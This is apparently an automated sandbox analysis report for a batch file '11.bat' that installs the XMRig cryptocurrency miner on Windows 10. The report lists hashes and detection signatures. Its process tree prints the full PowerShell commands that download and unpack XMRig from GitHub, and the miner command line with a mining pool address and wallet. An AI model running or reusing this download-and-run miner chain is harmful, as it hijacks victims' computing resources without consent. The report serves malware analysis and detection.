Overview
overview
10Static
static
11.bat
windows10-1703-x64
1010.bat
windows10-1703-x64
1011.bat
windows10-1703-x64
1012.bat
windows10-1703-x64
1013.bat
windows10-1703-x64
1014.bat
windows10-1703-x64
1015.bat
windows10-1703-x64
102.bat
windows10-1703-x64
103.bat
windows10-1703-x64
104.bat
windows10-1703-x64
105.bat
windows10-1703-x64
106.bat
windows10-1703-x64
107.bat
windows10-1703-x64
108.bat
windows10-1703-x64
109.bat
windows10-1703-x64
10Resubmissions
Analysis
-
max time kernel
316s -
max time network
1796s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
20-05-2024 20:53
Static task
static1
Behavioral task
behavioral1
Sample
1.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
10.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
11.bat
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
12.bat
Resource
win10-20240404-en
Behavioral task
behavioral5
Sample
13.bat
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
14.bat
Resource
win10-20240404-en
Behavioral task
behavioral7
Sample
15.bat
Resource
win10-20240404-en
Behavioral task
behavioral8
Sample
2.bat
Resource
win10-20240404-en
Behavioral task
behavioral9
Sample
3.bat
Resource
win10-20240404-en
Behavioral task
behavioral10
Sample
4.bat
Resource
win10-20240404-en
Behavioral task
behavioral11
Sample
5.bat
Resource
win10-20240404-en
Behavioral task
behavioral12
Sample
6.bat
Resource
win10-20240404-en
Behavioral task
behavioral13
Sample
7.bat
Resource
win10-20240404-en
Behavioral task
behavioral14
Sample
8.bat
Resource
win10-20240404-en
General
-
Target
11.bat
-
Size
599B
-
MD5
798b979417aa88e5323ead9be2d8425c
-
SHA1
a54c5133c71afddf697f302b36bdb930c72852ce
-
SHA256
f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07
-
SHA512
a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe family_xmrig C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 4768 powershell.exe 4 4768 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
xmrig.exepid process 2528 xmrig.exe -
Processes:
powershell.exepowershell.exepid process 4768 powershell.exe 4628 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4768 powershell.exe 4768 powershell.exe 4768 powershell.exe 4628 powershell.exe 4628 powershell.exe 4628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exexmrig.exedescription pid process Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 4628 powershell.exe Token: SeLockMemoryPrivilege 2528 xmrig.exe Token: SeLockMemoryPrivilege 2528 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
xmrig.exepid process 2528 xmrig.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 4520 wrote to memory of 4768 4520 cmd.exe powershell.exe PID 4520 wrote to memory of 4768 4520 cmd.exe powershell.exe PID 4520 wrote to memory of 4628 4520 cmd.exe powershell.exe PID 4520 wrote to memory of 4628 4520 cmd.exe powershell.exe PID 4520 wrote to memory of 2528 4520 cmd.exe xmrig.exe PID 4520 wrote to memory of 2528 4520 cmd.exe xmrig.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4628 -
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exexmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b142⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2528
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD542d4b1d78e6e092af15c7aef34e5cf45
SHA16cf9d0e674430680f67260194d3185667a2bb77b
SHA256c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
SHA512d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930
-
Filesize
1KB
MD5519279024f58829cf1acb7a3d898ce95
SHA14d1a998ce01c13c8277d073268646d18127e128d
SHA256032aacd172c5bc6eccf940eb4db631f41ee390e078749ffb5e3b671bc6b8d86e
SHA5128b7adabd5594ff3571381e38bc19baf2773526c4a464f7e3bc8bb16ed6b31d92046a6b1c5195fa358cfc518d3cc36b82bd6fe0f119d5e5641395f76b93109adc
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
2.5MB
MD5cef0ae1ab544e40b659261a4e07fe48f
SHA1e5ff855ce3c7726a50eb50a634ff9f406b3df093
SHA256713263085499ae626a6148fab67932c9a69611b21ac3d04cf52a5e23495f902e
SHA5121fb23b385e6cff3653f0b4b397d092c7be4df62899c97e18f675df2024e5f06ef2596fb626b85ae2ef7d7583c5bf54b00dba1a5ad566c2707a669a48d9814ba8
-
Filesize
6.1MB
MD5c0f8959614ae06561216158d78a787e5
SHA173167d1fd0cee1c96a6505606d21cbfe4369eb00
SHA256e199d88569fb54346d5fa20ee7b59b2ea6f16f4ecca3ea1e1c937b11aab7b2b0
SHA512a24fcf344d08c64ac301d5e4979f062b5e28e8e4acf1d2790916149ffe7726b0c4a11e0775aeba6b841d2d5081e1bd13e2b80390bf9bfbc44d67e54ec07cd746